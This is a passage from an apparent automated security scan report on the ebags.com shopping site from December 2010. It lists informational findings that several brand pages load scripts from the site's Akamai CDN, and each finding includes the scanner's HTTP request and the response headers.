<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.5. http://www.ebags.com/brand/eagle-creek previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/eagle-creek

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:41 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:41 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 122990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.6. http://www.ebags.com/brand/fleurville previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/fleurville

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.7. http://www.ebags.com/brand/hobo-international previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hobo-international

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 52206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.8. http://www.ebags.com/brand/hurley previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/hurley

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 83654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.9. http://www.ebags.com/brand/ju-ju-be previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/ju-ju-be

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 68446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.10. http://www.ebags.com/brand/kalencom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/kalencom

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:21 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:21 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 103272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.11. http://www.ebags.com/brand/lego previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lego

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.12. http://www.ebags.com/brand/lodis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/lodis

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

